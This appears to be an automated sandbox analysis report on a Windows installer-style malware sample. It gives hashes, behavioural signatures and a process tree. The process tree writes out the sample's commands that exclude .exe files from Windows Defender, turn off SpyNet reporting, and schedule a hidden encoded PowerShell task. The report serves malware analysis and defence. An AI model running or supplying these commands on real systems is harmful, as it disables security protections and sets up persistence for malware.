Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

02f3c1cecd...c4.exe

windows7-x64

10

02f3c1cecd...c4.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    4s
  • max time network
    14s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/10/2023, 08:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4.exe

  • Size

    7.2MB

  • MD5

    71b7099f3f23955a8bc45829c9d0f05c

  • SHA1

    9372a91e395b9b773fa5e354212a5ae6476eb9b5

  • SHA256

    02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4

  • SHA512

    3532561545e52416c23497f76a0a79a7b8ecb3888f27d16cbcffcf850b043d1b7f96589627938385091855446bfff34b77b73a2d73ca9011d98c6018b3e41b36

  • SSDEEP

    196608:91O1W/pZgf52/wbIUXU3GYKPA99OJO1bytyfKhs11:3OEQUwCNUWsJHU

Score
7/10

Malware Config

Signatures

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4.exe
    "C:\Users\Admin\AppData\Local\Temp\02f3c1cecd341c0a023bc4ca9bfe435266327af571bb590d1f3acd661bc22ac4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2960
    • C:\Users\Admin\AppData\Local\Temp\7zSD002.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2856
      • C:\Users\Admin\AppData\Local\Temp\7zSD12B.tmp\Install.exe
        .\Install.exe /qGSediddTgIM "385118" /S
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4420
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3088
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3912
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3488
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3648
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4404
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2004
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:3336
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:4352
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gIFUvuebt" /SC once /ST 05:46:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:60
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gIFUvuebt"
                  4⤵
                    PID:4700
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              1⤵
                PID:916

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\7zSD002.tmp\Install.exe
                Filesize

                6.1MB

                MD5

                50e91b05c3b7d81790a35fed550e6475

                SHA1

                7bf8e68a0ddd556d448333eef00012e5e8fae454

                SHA256

                693b54b819fc7779b066aa0e3ff17bf80f1c297c49a381825d5d662a1d5e95a5

                SHA512

                942dac20d64c196740374c96a2169b599596fa72695eddce53995fde7cf753bbc01783db7b71af3cb9379d420983a60f3d6a67dcccdc79dcff9738ec8824b928

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\7zSD002.tmp\Install.exe
                Filesize

                6.1MB

                MD5

                50e91b05c3b7d81790a35fed550e6475

                SHA1

                7bf8e68a0ddd556d448333eef00012e5e8fae454

                SHA256

                693b54b819fc7779b066aa0e3ff17bf80f1c297c49a381825d5d662a1d5e95a5

                SHA512

                942dac20d64c196740374c96a2169b599596fa72695eddce53995fde7cf753bbc01783db7b71af3cb9379d420983a60f3d6a67dcccdc79dcff9738ec8824b928

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\7zSD12B.tmp\Install.exe
                Filesize

                6.8MB

                MD5

                3f03a068ff69ab813dd885d0b8859d4f

                SHA1

                4a2bd1bd2abee50d847b61ab5c50295108a79765

                SHA256

                d7ea53fc6ff0c47b0f9fd0c4fd75e40bc9541a9484f00e4f7e956995873a7214

                SHA512

                270f7e49c40b72f9961fa340c758abaa3d9af9af29d8e7b1a13f3d7957b8d1a71b3884bed3d592e995f116620322357effdef92f4d96c1fc737f4c5055781d12

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m0xiapno.lo4.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • memory/916-16-0x00007FFED0560000-0x00007FFED1021000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/916-17-0x000001C14B200000-0x000001C14B210000-memory.dmp

                Filesize

                64KB

                Download

              • memory/916-23-0x000001C14B200000-0x000001C14B210000-memory.dmp

                Filesize

                64KB

                Download

              • memory/916-28-0x000001C165AC0000-0x000001C165AE2000-memory.dmp

                Filesize

                136KB

                Download

              • memory/4420-11-0x0000000000DC0000-0x000000000148B000-memory.dmp

                Filesize

                6.8MB

                Download

              • memory/4420-12-0x0000000010000000-0x0000000010591000-memory.dmp

                Filesize

                5.6MB

                Download